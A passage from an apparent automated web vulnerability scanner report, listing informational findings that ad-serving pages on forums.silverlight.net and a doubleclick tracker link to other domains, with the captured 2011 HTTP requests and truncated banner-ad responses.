<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=equifax_cs=4&betq=5620=434923" width = "1" height = "1" border = "0"></body>
...[SNIP]...

23.244. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 24 Apr 2011 12:09:48 GMT
Expires: Sun, 24 Apr 2011 12:09:48 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2284

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><script>(function(){var e=(new Date).getTime();var f=function(a,b){var c=document.crea
...[SNIP]...
<div id='m3_tracker_276' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://delivery.ctasnet.com/adserver/www/delivery/ti.php?trackerid=276&amp;cb=%%RANDOM_NUMBER%%' width='0' height='0' alt=''/></div>
...[SNIP]...
<noscript><img src="http://static.2mdn.net/csi/d?s=floodlight&v=3&action=noscript_load&adi=spotid_2182862"></noscript><img src="http://static.2mdn.net/csi/d?s=floodlight&v=3&action=body_end&adi=spotid_2182862"></body>
...[SNIP]...

23.245. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/13.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:58 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:59 GMT
Content-Length: 424


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=711&AdvertiserID=70&BannerID=560&SiteID=6&RandomNumber=1383524288&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DK2011-TechNet_RON_728x90-Banner-01.jpg" width="728" height="90" alt="Advertising - Diskeeper" align="Center" border="0"></a>
...[SNIP]...

23.246. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/p/226774/548773.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:58:28 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:30 GMT
Content-Length: 399


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=679&AdvertiserID=12&BannerID=589&SiteID=6&RandomNumber=791803725&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/2011_q1_728x90.gif" width="728" height="90" alt="Advertising - Aspose" align="Center" border="0"></a>
...[SNIP]...

23.247. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/p/226774/548773.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:58:28 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:30 GMT
Content-Length: 405


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=733&AdvertiserID=68&BannerID=554&SiteID=6&RandomNumber=791803725&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/Test_any_app_728x90.jpg" width="728" height="90" alt="Advertising - Telerik" align="Center" border="0"></a>
...[SNIP]...

23.248. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=49&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/17.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:00 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:01 GMT
Content-Length: 376


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=54&CampaignID=692&AdvertiserID=11&BannerID=324&SiteID=6&RandomNumber=936561576&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DV-300x250.png" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

23.249. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/TopicsNotAnswered.aspx?ForumID=-1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:03 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:05 GMT
Content-Length: 451


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=401&CampaignID=2065&AdvertiserID=40&BannerID=2792&SiteID=2&RandomNumber=516276557&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/728x90DASP_bluylwwht_silverlighthosting_5m_SM.gif" width="728" height="90" alt="Silverlight Hosting for Only $5/month! Click Here and Sign Up Today!" align="Center" border="0"></a>
...[SNIP]...

23.250. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:51 GMT; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:56 GMT
Content-Length: 378


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=715&AdvertiserID=59&BannerID=504&SiteID=6&RandomNumber=752258582&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/3_AR%20728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.251. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/default.aspx%2526ot%253DA; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:54 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:57 GMT
Content-Length: 383


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=715&AdvertiserID=59&BannerID=503&SiteID=6&RandomNumber=1024451140&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/1_Spread%20728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.252. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=45&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:51 GMT; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:54 GMT
Content-Length: 393


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=54&CampaignID=720&AdvertiserID=51&BannerID=479&SiteID=6&RandomNumber=2125941422&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/ClientUI%20ad4%20(300x250).jpg" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

23.253. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/t/226774.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:58:24 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:27 GMT
Content-Length: 390


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=736&AdvertiserID=15&BannerID=457&SiteID=6&RandomNumber=111242187&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/728x90_TFS_sparklypigs_SM.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.254. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/default.aspx%2526ot%253DA; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:54 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:55 GMT
Content-Length: 383


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=715&AdvertiserID=59&BannerID=503&SiteID=6&RandomNumber=1178939087&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/1_Spread%20728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.255. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/t/226774.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:58:24 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:27 GMT
Content-Length: 408


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=683&AdvertiserID=80&BannerID=590&SiteID=6&RandomNumber=1627335261&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/728X90-OnlineNMG1c.gif" width="728" height="90" alt="Advertising - CBT Direct" align="Center" border="0"></a>
...[SNIP]...

23.256. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=416&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/TopicsNotAnswered.aspx?ForumID=-1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:03 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:05 GMT
Content-Length: 382


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=54&CampaignID=687&AdvertiserID=11&BannerID=402&SiteID=6&RandomNumber=442273714&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/Charting-300x250.png" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

23.257. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/17.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:00 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:02 GMT
Content-Length: 408


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=683&AdvertiserID=80&BannerID=590&SiteID=6&RandomNumber=1215514870&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/728X90-OnlineNMG1c.gif" width="728" height="90" alt="Advertising - CBT Direct" align="Center" border="0"></a>
...[SNIP]...

23.258. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
